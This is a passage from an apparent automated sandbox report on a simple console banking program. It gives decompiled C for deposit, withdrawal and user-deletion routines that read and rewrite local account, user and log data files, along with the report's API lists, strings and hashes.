					_t255 = _t253 + 0x10;
					 *0x23b284 = _t134;
					_v12 = 0;
					while(1) {
						_t139 =  *0x23b288; // 0x0
						_t140 = fscanf(_t139, "%s %s %s %s %s %s %c %s %c %f %f %f\n",  &_v208,  &_v200,  &_v170,  &_v125,  &_v112,  &_v62,  &_v113,  &_v140,  &_v42,  &_v40,  &_v36,  &_v32);
						_t256 = _t255 + 0x38;
						__eflags = _t140 - 0xffffffff;
						if(_t140 == 0xffffffff) {
							break;
						}
						_t150 = strcmp( &_v208,  &_v28);
						_t265 = _t256 + 8;
						__eflags = _t150;
						if(__eflags == 0) {
							asm("movss xmm0, [ebp-0x24]");
							asm("subss xmm0, [ebp-0xc]");
							asm("movss [ebp-0x24], xmm0");
						}
						asm("movss xmm0, [0x238110]");
						asm("comiss xmm0, [ebp-0x24]");
						if(__eflags > 0) {
							asm("movss xmm0, [ebp-0x20]");
							asm("addss xmm0, [ebp-0x24]");
							asm("movss [ebp-0x20], xmm0");
							asm("movss xmm0, [0x238110]");
							asm("movss [ebp-0x24], xmm0");
						}
						asm("movss xmm0, [ebp-0x24]");
						asm("addss xmm0, [ebp-0x20]");
						asm("movss [ebp-0x1c], xmm0");
						asm("cvtss2sd xmm0, [ebp-0x1c]");
						asm("movsd [esp], xmm0");
						asm("cvtss2sd xmm0, [ebp-0x20]");
						asm("movsd [esp], xmm0");
						asm("cvtss2sd xmm0, [ebp-0x24]");
						asm("movsd [esp], xmm0");
						_push(_v42);
						_push( &_v140);
						_push(_v113);
						_push( &_v62);
						_push( &_v112);
						_push( &_v125);
						_push( &_v170);
						_push( &_v200);
						_push( &_v208);
						_t154 =  *0x23b284; // 0x0
						fprintf(_t154, "%s %s %s %s %s %s %c %s %c %.2f %.2f %.2f\n");
						_t255 = _t265 - 0xfffffffffffffff8 + 0x44;
					}
					_t192 =  *0x23b284; // 0x0
					fclose(_t192);
					_t221 =  *0x23b288; // 0x0
					fclose(_t221);
					 *0x23b288 = fopen("TRANSACTION.DAT", "a");
					__imp___strtime(0x23b290);
					_push(0x23b244);
					asm("cvtss2sd xmm0, [ebp-0xc]");
					asm("movsd [esp], xmm0");
					_push(0x23b290);
					_push(0x23b2a0);
					_push("Cash+Withdrawn");
					_push( &_v28);
					_t193 =  *0x23b288; // 0x0
					fprintf(_t193, "%s %s %s %s %.2f %s\n");
					_t222 =  *0x23b288; // 0x0
					fclose(_t222);
					E002323F0(_t193, _t278);
					E00231000(0x14, 0xc);
					return printf("Transaction completed successfully!");
				}
				__eflags = _v5 - 0x79;
				if(_v5 == 0x79) {
					goto L15;
				}
				return _t132;
			}

0x002352e0
0x002352e9
0x002352f0
0x002352f9
0x00235303
0x0023530f
0x00235315
0x00235330
0x00235342
0x00235348
0x0023534b
0x00235350
0x00235391
0x00235397
0x0023539d
0x002353a3
0x00000000
0x00000000
0x002353b0
0x002353b5
0x002353ba
0x002353c2
0x002353d3
0x002353e7
0x002353fd
0x00235402
0x00235402
0x00235405
0x0023540a
0x00235410
0x00235416
0x00235419
0x0023541d
0x0023541f
0x00235428
0x00000000
0x00235438
0x00235444
0x0023544f
0x00235455
0x00235462
0x0023546c
0x00235478
0x0023547e
0x00235491
0x00235497
0x0023549a
0x0023549f
0x002354a6
0x002354e7
0x002354ed
0x002354f3
0x002354f6
0x002354f9
0x00000000
0x00000000
0x00235506
0x0023550b
0x0023550e
0x00235510
0x00235512
0x00235517
0x0023551b
0x0023551d
0x00235526
0x0023552b
0x00235533
0x0023553d
0x0023554a
0x00235554
0x0023555d
0x00000000
0x0023555d
0x0023551b
0x00235569
0x0023556e
0x00235574
0x0023557d
0x00235586
0x00235590
0x00235596
0x0023559b
0x002355a7
0x002355b0
0x002355bb
0x002355cc
0x002355dc
0x002355e4
0x002355e9
0x002355fa
0x00235610
0x00235624
0x00235647
0x00235653
0x00235660
0x0023566a
0x00235670
0x00235677
0x0023567a
0x00235689
0x0023569c
0x002356ab
0x002356b1
0x002356b4
0x002356b9
0x002356c0
0x00235701
0x00235707
0x0023570d
0x00235710
0x00235713
0x00000000
0x00000000
0x00235724
0x00235729
0x0023572c
0x0023572e
0x00235730
0x00235735
0x0023573a
0x0023573a
0x0023573f
0x00235747
0x0023574b
0x0023574d
0x00235752
0x00235757
0x0023575c
0x00235764
0x00235764
0x00235769
0x0023576e
0x00235773
0x00235778
0x00235780
0x00235785
0x0023578d
0x00235792
0x0023579a
0x002357a3
0x002357aa
0x002357af
0x002357b3
0x002357b7
0x002357bb
0x002357c2
0x002357c9
0x002357d0
0x002357d6
0x002357dc
0x002357e2
0x002357e2
0x002357ea
0x002357f1
0x002357fa
0x00235801
0x0023581d
0x00235827
0x00235830
0x00235835
0x0023583d
0x00235842
0x00235847
0x0023584c
0x00235854
0x0023585a
0x00235861
0x0023586a
0x00235871
0x0023587a
0x00235883
0x00000000
0x00235893
0x00235680
0x00235683
0x00000000
0x00000000
0x00235899

APIs

Part of subcall function 002323F0: printf.MSVCRT ref: 0023240F
Part of subcall function 002323F0: strcmp.MSVCRT ref: 0023242B
Part of subcall function 002323F0: printf.MSVCRT ref: 0023244F
Part of subcall function 002323F0: printf.MSVCRT ref: 00232472
Part of subcall function 002323F0: _strdate.MSVCRT ref: 00232480
Part of subcall function 002323F0: printf.MSVCRT ref: 0023249D
Part of subcall function 002323F0: _strdate.MSVCRT ref: 002324AB
Part of subcall function 002323F0: printf.MSVCRT ref: 002324DF

Part of subcall function 00231000: GetStdHandle.KERNEL32(000000F5,00000000,?,002310E3,?,?,?,00237B25), ref: 00231021
Part of subcall function 00231000: SetConsoleCursorPosition.KERNEL32(00000000,?,002310E3,?,?,?,00237B25), ref: 00231028

printf.MSVCRT ref: 00235303
scanf.MSVCRT ref: 00235315
_strupr.MSVCRT ref: 00235322
strcpy.MSVCRT(?,00000000), ref: 00235330
fopen.MSVCRT ref: 00235342
fscanf.MSVCRT ref: 00235397
strcmp.MSVCRT ref: 002353B0
strcpy.MSVCRT(?,?), ref: 002353D3
strcat.MSVCRT(?,0023A770), ref: 002353E7
strcat.MSVCRT(?,?), ref: 002353FD
fclose.MSVCRT ref: 00235410
printf.MSVCRT ref: 00235432
printf.MSVCRT ref: 00235455
printf.MSVCRT ref: 0023546C
scanf.MSVCRT ref: 0023547E
fopen.MSVCRT ref: 00235491
fscanf.MSVCRT ref: 002354ED
strcmp.MSVCRT ref: 00235506
printf.MSVCRT ref: 0023553D
printf.MSVCRT ref: 00235554

Strings

Sorry, the current balance is Rs. %.2f only!, xrefs: 00235538
%s to be Withdrawn from A/C number : %s [%s], xrefs: 002355C7
p5u:u@su, xrefs: 002357DC, 00235861
%s %s %s %s %s %s %c %s %c %.2f %.2f %.2f, xrefs: 002357D1
TRANSACTION.DAT, xrefs: 0023580F
Cash+Withdrawn, xrefs: 0023584C
Transaction completed successfully!, xrefs: 00235888
%s %s %s %s %s %s %c %s %c %f %f %f, xrefs: 0023538C
[In words : , xrefs: 002355EE
Withdraw from A/C number : , xrefs: 002352FE
Confirm Transaction, xrefs: 0023558B
Are you sure you want to perform this tranasction? <Y/N>, xrefs: 00235665
ACCOUNT.DAT, xrefs: 0023568E
Transaction NOT completed!, xrefs: 0023554F
Given A/C number does not exits!, xrefs: 0023542D
Amount to be Withdrawn (in NRs.) : , xrefs: 00235467
[ %s ], xrefs: 00235450
%s %s %s %s %s %s %c %s %c %f %f %f, xrefs: 002356FC
ACCOUNT.DAT, xrefs: 0023533D
%s %s %s %s %s %s %c %s %c %f %f %f, xrefs: 002354E2
TEMP.DAT, xrefs: 002356A6
ACCOUNT.DAT, xrefs: 0023548C
%s %s %s %s %.2f %s, xrefs: 00235855

Memory Dump Source

Source File: 00000000.00000002.244120518.0000000000231000.00000020.00020000.sdmp, Offset: 00230000, based on PE: true

Associated: 00000000.00000002.244113353.0000000000230000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.244137823.0000000000238000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.244153970.0000000000239000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.244162037.000000000023C000.00000002.00020000.sdmp Download File

Similarity

API ID: printf$strcmp$_strdatefopenfscanfscanfstrcatstrcpy$ConsoleCursorHandlePosition_struprfclose
String ID: %s %s %s %s %.2f %s$%s %s %s %s %s %s %c %s %c %.2f %.2f %.2f$%s %s %s %s %s %s %c %s %c %f %f %f$%s %s %s %s %s %s %c %s %c %f %f %f$%s %s %s %s %s %s %c %s %c %f %f %f$%s to be Withdrawn from A/C number : %s [%s]$ACCOUNT.DAT$ACCOUNT.DAT$ACCOUNT.DAT$Amount to be Withdrawn (in NRs.) : $Are you sure you want to perform this tranasction? <Y/N>$Cash+Withdrawn$Confirm Transaction$Given A/C number does not exits!$Sorry, the current balance is Rs. %.2f only!$TEMP.DAT$TRANSACTION.DAT$Transaction NOT completed!$Transaction completed successfully!$Withdraw from A/C number : $[ %s ]$[In words : $p5u:u@su
API String ID: 3673828735-3110903438
Opcode ID: 3a094f5da1e8ff8fa08ac76d95eb0bd046a2e9ab6f38127d66d378c874f09d90
Instruction ID: 64d4128de2348b85dd3d7b7c999f80c0e657b4951bdc922508a8a0c37687d239
Opcode Fuzzy Hash: 3a094f5da1e8ff8fa08ac76d95eb0bd046a2e9ab6f38127d66d378c874f09d90
Instruction Fuzzy Hash: 6EF1A7F2D10208ABDB15DFA4DC8AEDEB778AF15701F044655F60AB6050EB7066ACCF62

Uniqueness

Uniqueness Score: -1.00%

Function 00232C00, Relevance: 100.0, APIs: 42, Strings: 15, Instructions: 284
stringfileCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E00232C00(void* __ecx, void* __fp0) {
				char _v5;
				intOrPtr _v12;
				char _v20;
				char _v23;
				char _v27;
				char _v31;
				char _v35;
				char _v39;
				char _v43;
				char _v47;
				char _v51;
				char _v52;
				char _v84;
				char _v116;
				char _v129;
				char _v139;
				char _v154;
				char _v188;
				struct _IO_FILE* _t58;
				int _t60;
				struct _IO_FILE* _t66;
				struct _IO_FILE* _t67;
				int _t68;
				struct _IO_FILE* _t70;
				struct _IO_FILE* _t73;
				int _t75;
				struct _IO_FILE* _t76;
				int _t86;
				int _t94;
				struct _IO_FILE* _t95;
				int _t98;
				char _t100;
				int _t113;
				int _t114;
				struct _IO_FILE* _t120;
				struct _IO_FILE* _t124;
				struct _IO_FILE* _t135;
				struct _IO_FILE* _t138;
				struct _IO_FILE* _t140;
				struct _IO_FILE* _t143;
				void* _t149;
				void* _t154;
				void* _t155;
				void* _t156;
				void* _t157;
				void* _t159;
				void* _t160;
				void* _t164;
				void* _t165;
				void* _t175;

				_t190 = __fp0;
				_v52 = 0;
				_v51 = 0;
				_v47 = 0;
				_v43 = 0;
				_v39 = 0;
				_v35 = 0;
				_v31 = 0;
				_v27 = 0;
				_v23 = 0;
				_v12 = 0;
				E002323F0(__ecx, __fp0);
				E00231000(0x19, 8);
				printf("User Name  : ");
				_push(0x23b244);
				scanf("%s");
				E00231000(0x19, 0xa);
				printf("Password  : ");
				E00231040( &_v52);
				strcpy(0x23b262,  &_v52);
				_t58 = fopen("USER.DAT", "r");
				_t154 = _t149 + 0x20;
				 *0x23b288 = _t58;
				while(1) {
					_t135 =  *0x23b288; // 0x0
					_t60 = fscanf(_t135, "%s %s %s\n", 0x23b240,  &_v84,  &_v116);
					_t155 = _t154 + 0x14;
					if(_t60 == 0xffffffff) {
						break;
					}
					strcpy( &_v84, _strupr( &_v84));
					strcpy( &_v116, _strupr( &_v116));
					strcpy(0x23b244, _strupr(0x23b244));
					strcpy(0x23b262, _strupr(0x23b262));
					_t113 = strcmp(0x23b244,  &_v84);
					_t154 = _t155 + 0x38;
					if(_t113 == 0) {
						_t114 = strcmp(0x23b262,  &_v116);
						_t154 = _t154 + 8;
						if(_t114 == 0) {
							_v12 = _v12 + 1;
						}
					}
				}
				_t120 =  *0x23b288; // 0x0
				fclose(_t120);
				_t156 = _t155 + 4;
				E002323F0(_t120, _t190);
				if(_v12 != 0) {
					E00231000(0xf, 0xa);
					printf("Are you sure you want to DELETE this user? <Y/N> : ");
					_t157 = _t156 + 4;
					if(_v5 == 0x59) {
						L10:
						 *0x23b288 = fopen("USER.DAT", "r");
						_t66 = fopen("temp.dat", "a");
						_t159 = _t157 + 0x10;
						 *0x23b280 = _t66;
						while(1) {
							_t67 =  *0x23b288; // 0x0
							_t68 = fscanf(_t67, "%s %s %s\n", 0x23b240,  &_v84,  &_v116);
							_t160 = _t159 + 0x14;
							if(_t68 == 0xffffffff) {
								break;
							}
							strcpy( &_v84, _strupr( &_v84));
							strcpy( &_v116, _strupr( &_v116));
							_t94 = strcmp(0x23b244,  &_v84);
							_t175 = _t160 + 0x20;
							if(_t94 != 0) {
								L14:
								_push( &_v116);
								_push( &_v84);
								_push(0x23b240);
								_t95 =  *0x23b280; // 0x0
								fprintf(_t95, "%s %s %s\n");
								_t159 = _t175 + 0x14;
								L16:
								continue;
							}
							_t98 = strcmp(0x23b262,  &_v116);
							_t175 = _t175 + 8;
							if(_t98 == 0) {
								strcpy( &_v20, 0x23b240);
								_t159 = _t175 + 8;
								goto L16;
							}
							goto L14;
						}
						_t138 =  *0x23b288; // 0x0
						fclose(_t138);
						_t70 =  *0x23b280; // 0x0
						fclose(_t70);
						 *0x23b288 = fopen("LOG.DAT", "r");
						_t73 = fopen("temp.dat", "w");
						_t164 = _t160 + 0x18;
						 *0x23b280 = _t73;
						while(1) {
							_t140 =  *0x23b288; // 0x0
							_t75 = fscanf(_t140, "%s %s %s %s",  &_v188,  &_v154,  &_v139,  &_v129);
							_t165 = _t164 + 0x18;
							if(_t75 == 0xffffffff) {
								break;
							}
							_strupr( &_v188);
							_strupr( &_v20);
							_t86 = strcmp( &_v188,  &_v20);
							_t164 = _t165 + 0x10;
							if(_t86 != 0) {
								_push( &_v129);
								_push( &_v139);
								_push( &_v154);
								_push( &_v188);
								_t143 =  *0x23b280; // 0x0
								fprintf(_t143, "%s %s %s %s\n");
								_t164 = _t164 + 0x18;
							}
						}
						_t76 =  *0x23b288; // 0x0
						fclose(_t76);
						_t124 =  *0x23b280; // 0x0
						fclose(_t124);
						E002323F0(_t124, _t190);
						E00231000(0x19, 0xa);
						return printf("Record DELETED successfully!");
					}
					_t100 = _v5;
					if(_t100 != 0x79) {
						return _t100;
					}
					goto L10;
				}
				E00231000(0xa, 0xa);
				return printf(0x239660);
			}

0x00232c00
0x00232c09
0x00232c0f
0x00232c12
0x00232c15
0x00232c18
0x00232c1b
0x00232c1e
0x00232c21
0x00232c24
0x00232c27
0x00232c2e
0x00232c37
0x00232c41
0x00232c4a
0x00232c54
0x00232c61
0x00232c6b
0x00232c78
0x00232c86
0x00232c98
0x00232c9e
0x00232ca1
0x00232ca6
0x00232cb8
0x00232cbf
0x00232cc5
0x00232ccb
0x00000000
0x00000000
0x00232ce3
0x00232cfd
0x00232d19
0x00232d35
0x00232d46
0x00232d4b
0x00232d50
0x00232d5b
0x00232d60
0x00232d65
0x00232d6d
0x00232d6d
0x00232d65
0x00232d70
0x00232d75
0x00232d7c
0x00232d82
0x00232d85
0x00232d8e
0x00232db0
0x00232dba
0x00232dc0
0x00232dca
0x00232dd9
0x00232dec
0x00232dfb
0x00232e01
0x00232e04
0x00232e09
0x00232e1b
0x00232e21
0x00232e27
0x00232e2d
0x00000000
0x00000000
0x00232e45
0x00232e5f
0x00232e70
0x00232e75
0x00232e7a
0x00232e91
0x00232e94
0x00232e98
0x00232e99
0x00232ea3
0x00232ea9
0x00232eaf
0x00232ec5
0x00000000
0x00232ec5
0x00232e85
0x00232e8a
0x00232e8f
0x00232ebd
0x00232ec2
0x00000000
0x00232ec2
0x00000000
0x00232e8f
0x00232eca
0x00232ed1
0x00232eda
0x00232ee0
0x00232efc
0x00232f0b
0x00232f11
0x00232f14
0x00232f19
0x00232f37
0x00232f3e
0x00232f44
0x00232f4a
0x00000000
0x00000000
0x00232f53
0x00232f60
0x00232f74
0x00232f79
0x00232f7e
0x00232f83
0x00232f8a
0x00232f91
0x00232f98
0x00232f9e
0x00232fa5
0x00232fab
0x00232fab
0x00232fae
0x00232fb3
0x00232fb9
0x00232fc2
0x00232fc9
0x00232fd2
0x00232fdb
0x00000000
0x00232feb
0x00232dcc
0x00232dd3
0x00232ff1
0x00232ff1
0x00000000
0x00232dd3
0x00232d94
0x00000000

APIs

Part of subcall function 002323F0: printf.MSVCRT ref: 0023240F
Part of subcall function 002323F0: strcmp.MSVCRT ref: 0023242B
Part of subcall function 002323F0: printf.MSVCRT ref: 0023244F
Part of subcall function 002323F0: printf.MSVCRT ref: 00232472
Part of subcall function 002323F0: _strdate.MSVCRT ref: 00232480
Part of subcall function 002323F0: printf.MSVCRT ref: 0023249D
Part of subcall function 002323F0: _strdate.MSVCRT ref: 002324AB
Part of subcall function 002323F0: printf.MSVCRT ref: 002324DF

Part of subcall function 00231000: GetStdHandle.KERNEL32(000000F5,00000000,?,002310E3,?,?,?,00237B25), ref: 00231021
Part of subcall function 00231000: SetConsoleCursorPosition.KERNEL32(00000000,?,002310E3,?,?,?,00237B25), ref: 00231028

printf.MSVCRT ref: 00232C41
scanf.MSVCRT ref: 00232C54
printf.MSVCRT ref: 00232C6B

Part of subcall function 00231040: isprint.MSVCRT ref: 00231052
Part of subcall function 00231040: printf.MSVCRT ref: 0023107A

strcpy.MSVCRT(0023B262,00000000,00000000,?,?,?,?,?,?,?,?,00232875), ref: 00232C86
fopen.MSVCRT ref: 00232C98
fscanf.MSVCRT ref: 00232CBF
_strupr.MSVCRT ref: 00232CD5
strcpy.MSVCRT(?,00000000), ref: 00232CE3
_strupr.MSVCRT ref: 00232CEF
strcpy.MSVCRT(?,00000000), ref: 00232CFD
_strupr.MSVCRT ref: 00232D0A
strcpy.MSVCRT(0023B244,00000000), ref: 00232D19
_strupr.MSVCRT ref: 00232D26
strcpy.MSVCRT(0023B262,00000000), ref: 00232D35
strcmp.MSVCRT ref: 00232D46
strcmp.MSVCRT ref: 00232D5B
fclose.MSVCRT ref: 00232D7C
printf.MSVCRT ref: 00232D9E
printf.MSVCRT ref: 00232DBA
fopen.MSVCRT ref: 00232DE3
fopen.MSVCRT ref: 00232DFB
fscanf.MSVCRT ref: 00232E21
_strupr.MSVCRT ref: 00232E37
strcpy.MSVCRT(?,00000000), ref: 00232E45
_strupr.MSVCRT ref: 00232E51
strcpy.MSVCRT(?,00000000), ref: 00232E5F
strcmp.MSVCRT ref: 00232E70
strcmp.MSVCRT ref: 00232E85
fprintf.MSVCRT ref: 00232EA9
strcpy.MSVCRT(00000001,0023B240), ref: 00232EBD
fclose.MSVCRT ref: 00232ED1
fclose.MSVCRT ref: 00232EE0
fopen.MSVCRT ref: 00232EF3
fopen.MSVCRT ref: 00232F0B
fscanf.MSVCRT ref: 00232F3E
_strupr.MSVCRT ref: 00232F53
_strupr.MSVCRT ref: 00232F60
strcmp.MSVCRT ref: 00232F74
fprintf.MSVCRT ref: 00232FA5
fclose.MSVCRT ref: 00232FB9
fclose.MSVCRT ref: 00232FC9
printf.MSVCRT ref: 00232FE5

Strings

p5u:u@su, xrefs: 00232EA9, 00232FA5
temp.dat, xrefs: 00232F06
User Name : , xrefs: 00232C3C
Password : , xrefs: 00232C66
LOG.DAT, xrefs: 00232EEE
Are you sure you want to DELETE this user? <Y/N> : , xrefs: 00232DB5
%s %s %s %s, xrefs: 00232F32
USER.DAT, xrefs: 00232DDE
%s %s %s, xrefs: 00232E16
temp.dat, xrefs: 00232DF6
Record DELETED successfully!, xrefs: 00232FE0
USER.DAT, xrefs: 00232C93
%s %s %s, xrefs: 00232CB3
%s %s %s, xrefs: 00232E9E
%s %s %s %s, xrefs: 00232F99

Memory Dump Source

Source File: 00000000.00000002.244120518.0000000000231000.00000020.00020000.sdmp, Offset: 00230000, based on PE: true

Associated: 00000000.00000002.244113353.0000000000230000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.244137823.0000000000238000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.244153970.0000000000239000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.244162037.000000000023C000.00000002.00020000.sdmp Download File

Similarity

API ID: printf$_struprstrcpy$strcmp$fclosefopen$fscanf$_strdatefprintf$ConsoleCursorHandlePositionisprintscanf
String ID: %s %s %s$%s %s %s$%s %s %s$%s %s %s %s$%s %s %s %s$Are you sure you want to DELETE this user? <Y/N> : $LOG.DAT$Password : $Record DELETED successfully!$USER.DAT$USER.DAT$User Name : $p5u:u@su$temp.dat$temp.dat
API String ID: 2784916429-3499515720
Opcode ID: fd53ddb62070a72b062d40fa81f925ee35198d8df0b3e0fb7cd2e32bda5a03f9
Instruction ID: 36dfe5b24c446c23323d8f975114f4bc8b4434344aac50e6d33049211d978b64
Opcode Fuzzy Hash: fd53ddb62070a72b062d40fa81f925ee35198d8df0b3e0fb7cd2e32bda5a03f9
Instruction Fuzzy Hash: 98A165F1D20304ABDB159FA4AC8AE9F7738BB12705F040619FA05A5191EBB1A57CCF62

Uniqueness

Uniqueness Score: -1.00%

Function 00234E40, Relevance: 94.8, APIs: 35, Strings: 19, Instructions: 326
stringfileCOMMON

Download Yara Rule

C-Code - Quality: 59%

			E00234E40(void* __ecx, void* __fp0) {
				char _v5;
				char _v12;
				intOrPtr _v16;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v42;
				char _v62;
				char _v112;
				char _v113;
				char _v125;
				char _v140;
				char _v170;
				char _v200;
				char _v208;
				char _v244;
				char _v324;
				char _v360;
				char _v440;
				struct _IO_FILE* _t73;
				struct _IO_FILE* _t78;
				int _t79;
				struct _IO_FILE* _t80;
				char _t107;
				struct _IO_FILE* _t109;
				int _t114;
				struct _IO_FILE* _t115;
				struct _IO_FILE* _t119;
				int _t126;
				int _t134;
				struct _IO_FILE* _t157;
				struct _IO_FILE* _t158;
				struct _IO_FILE* _t181;
				struct _IO_FILE* _t186;
				void* _t190;
				void* _t195;
				void* _t196;
				void* _t197;
				void* _t208;
				void* _t210;
				void* _t211;
				void* _t220;

				_t230 = __fp0;
				_v16 = 0;
				E002323F0(__ecx, __fp0);
				E00231000(5, 0xa);
				printf("Deposit to A/C number            : ");
				_push( &_v28);
				scanf("%s");
				strcpy( &_v28, _strupr( &_v28));
				_t73 = fopen("ACCOUNT.DAT", "r");
				_t195 = _t190 + 0x20;
				 *0x23b288 = _t73;
				while(1) {
					_t78 =  *0x23b288; // 0x0
					_t79 = fscanf(_t78, "%s %s %s %s %s %s %c %s %c %f %f %f\n",  &_v208,  &_v200,  &_v170,  &_v125,  &_v112,  &_v62,  &_v113,  &_v140,  &_v42,  &_v40,  &_v36,  &_v32);
					_t196 = _t195 + 0x38;
					if(_t79 == 0xffffffff) {
						break;
					}
					_t134 = strcmp( &_v28,  &_v208);
					_t195 = _t196 + 8;
					if(_t134 == 0) {
						_v16 = _v16 + 1;
						strcpy( &_v244,  &_v200);
						strcat( &_v244, " ");
						strcat( &_v244,  &_v170);
						_t195 = _t195 + 0x18;
					}
				}
				_t80 =  *0x23b288; // 0x0
				fclose(_t80);
				_t197 = _t196 + 4;
				if(_v16 == 0) {
					E002323F0( &_v200, _t230);
					E00231000(0x14, 0xc);
					return printf("Given A/C number does not exits!");
				}
				E00231000(0x32, 0xa);
				_push( &_v244);
				printf("[ %s ]");
				E00231000(5, 0xc);
				printf("Amount to be Deposited (in NRs.) : ");
				_push( &_v12);
				scanf("%f");
				E002323F0( &_v244, _t230);
				E00231000(0x1e, 0xa);
				printf("Confirm Transaction");
				asm("movss xmm0, [ebp-0x8]");
				asm("movss [esp], xmm0");
				E00231730( &_v360,  &_v360);
				E00231000(3, 0xc);
				_push( &_v244);
				printf("%s to be deposited in A/C number : %s [ %s ]");
				asm("cvtss2sd xmm0, [ebp-0x8]");
				asm("movsd [esp], xmm0");
				E00231A20( &_v440,  &_v360,  &_v28);
				strcpy( &_v324, "[In words : ");
				strcat( &_v324,  &_v440);
				strcat( &_v324, "]");
				E00231000(0x28 - (strlen( &_v324) >> 1), 0xe);
				puts( &_v324);
				E00231000(8, 0x11);
				printf("Are you sure you want to perform this tranasction? <Y/N>");
				_t208 = _t197 + 0x24 - 8 + 0x24;
				_t107 = _v5;
				if(_t107 == 0x59 || _v5 == 0x79) {
					 *0x23b288 = fopen("ACCOUNT.DAT", "r");
					_t109 = fopen("TEMP.DAT", "a");
					_t210 = _t208 + 0x10;
					 *0x23b284 = _t109;
					while(1) {
						_t181 =  *0x23b288; // 0x0
						_t114 = fscanf(_t181, "%s %s %s %s %s %s %c %s %c %f %f %f\n",  &_v208,  &_v200,  &_v170,  &_v125,  &_v112,  &_v62,  &_v113,  &_v140,  &_v42,  &_v40,  &_v36,  &_v32);
						_t211 = _t210 + 0x38;
						if(_t114 == 0xffffffff) {
							break;
						}
						_t126 = strcmp( &_v208,  &_v28);
						_t220 = _t211 + 8;
						if(_t126 == 0) {
							asm("movss xmm0, [ebp-0x24]");
							asm("addss xmm0, [ebp-0x8]");
							asm("movss [ebp-0x24], xmm0");
						}
						asm("movss xmm0, [ebp-0x24]");
						asm("addss xmm0, [ebp-0x20]");
						asm("movss [ebp-0x1c], xmm0");
						asm("cvtss2sd xmm0, [ebp-0x1c]");
						asm("movsd [esp], xmm0");
						asm("cvtss2sd xmm0, [ebp-0x20]");
						asm("movsd [esp], xmm0");
						asm("cvtss2sd xmm0, [ebp-0x24]");
						asm("movsd [esp], xmm0");
						_push(_v42);
						_push( &_v140);
						_push(_v113);
						_push( &_v62);
						_push( &_v112);
						_push( &_v125);
						_push( &_v170);
						_push( &_v200);
						_push( &_v208);
						_t186 =  *0x23b284; // 0x0
						fprintf(_t186, "%s %s %s %s %s %s %c %s %c %.2f %.2f %.2f\n");
						_t210 = _t220 - 0xfffffffffffffff8 + 0x44;
					}
					_t115 =  *0x23b284; // 0x0
					fclose(_t115);
					_t157 =  *0x23b288; // 0x0
					fclose(_t157);
					 *0x23b288 = fopen("TRANSACTION.DAT", "a");
					__imp___strtime(0x23b290);
					_push(0x23b244);
					asm("cvtss2sd xmm0, [ebp-0x8]");
					asm("movsd [esp], xmm0");
					_push(0x23b290);
					_push(0x23b2a0);
					_push("Cash+Deposited");
					_push( &_v28);
					_t119 =  *0x23b288; // 0x0
					fprintf(_t119, "%s %s %s %s %.2f %s\n");
					_t158 =  *0x23b288; // 0x0
					fclose(_t158);
					E002323F0(_t158, _t230);
					E00231000(0x14, 0xc);
					return printf("Transaction completed successfully!");
				}
				return _t107;
			}

0x00234e40
0x00234e49
0x00234e50
0x00234e59
0x00234e63
0x00234e6f
0x00234e75
0x00234e90
0x00234ea2
0x00234ea8
0x00234eab
0x00234eb0
0x00234ef1
0x00234ef7
0x00234efd
0x00234f03
0x00000000
0x00000000
0x00234f10
0x00234f15
0x00234f1a
0x00234f22
0x00234f33
0x00234f47
0x00234f5d
0x00234f62
0x00234f62
0x00234f65
0x00234f6a
0x00234f70
0x00234f76
0x00234f7d
0x00234f7f
0x00234f88
0x00000000
0x00234f98
0x00234fa4
0x00234faf
0x00234fb5
0x00234fc2
0x00234fcc
0x00234fd8
0x00234fde
0x00234fe7
0x00234ff0
0x00234ffa
0x00235000
0x00235005
0x00235011
0x0023501a
0x00235025
0x00235036
0x00235046
0x0023504e
0x00235053
0x00235064
0x0023507a
0x0023508e
0x002350b1
0x002350bd
0x002350ca
0x002350d4
0x002350da
0x002350dd
0x002350e4
0x00235106
0x00235115
0x0023511b
0x0023511e
0x00235123
0x00235164
0x0023516b
0x00235171
0x00235177
0x00000000
0x00000000
0x00235188
0x0023518d
0x00235192
0x00235194
0x00235199
0x0023519e
0x0023519e
0x002351a3
0x002351a8
0x002351ad
0x002351b2
0x002351ba
0x002351bf
0x002351c7
0x002351cc
0x002351d4
0x002351dd
0x002351e4
0x002351e9
0x002351ed
0x002351f1
0x002351f5
0x002351fc
0x00235203
0x0023520a
0x00235210
0x00235217
0x0023521d
0x0023521d
0x00235225
0x0023522b
0x00235234
0x0023523b
0x00235257
0x00235261
0x0023526a
0x0023526f
0x00235277
0x0023527c
0x00235281
0x00235286
0x0023528e
0x00235294
0x0023529a
0x002352a3
0x002352aa
0x002352b3
0x002352bc
0x00000000
0x002352cc
0x002352d2

APIs

Part of subcall function 002323F0: printf.MSVCRT ref: 0023240F
Part of subcall function 002323F0: strcmp.MSVCRT ref: 0023242B
Part of subcall function 002323F0: printf.MSVCRT ref: 0023244F
Part of subcall function 002323F0: printf.MSVCRT ref: 00232472
Part of subcall function 002323F0: _strdate.MSVCRT ref: 00232480
Part of subcall function 002323F0: printf.MSVCRT ref: 0023249D
Part of subcall function 002323F0: _strdate.MSVCRT ref: 002324AB
Part of subcall function 002323F0: printf.MSVCRT ref: 002324DF

Part of subcall function 00231000: GetStdHandle.KERNEL32(000000F5,00000000,?,002310E3,?,?,?,00237B25), ref: 00231021
Part of subcall function 00231000: SetConsoleCursorPosition.KERNEL32(00000000,?,002310E3,?,?,?,00237B25), ref: 00231028

printf.MSVCRT ref: 00234E63
scanf.MSVCRT ref: 00234E75
_strupr.MSVCRT ref: 00234E82
strcpy.MSVCRT(?,00000000), ref: 00234E90
fopen.MSVCRT ref: 00234EA2
fscanf.MSVCRT ref: 00234EF7
strcmp.MSVCRT ref: 00234F10
strcpy.MSVCRT(?,?), ref: 00234F33
strcat.MSVCRT(?,0023A534), ref: 00234F47
strcat.MSVCRT(?,?), ref: 00234F5D
fclose.MSVCRT ref: 00234F70
printf.MSVCRT ref: 00234F92
printf.MSVCRT ref: 00234FB5
printf.MSVCRT ref: 00234FCC
scanf.MSVCRT ref: 00234FDE
printf.MSVCRT ref: 00234FFA
printf.MSVCRT ref: 00235036
strcpy.MSVCRT(?,[In words : ), ref: 00235064
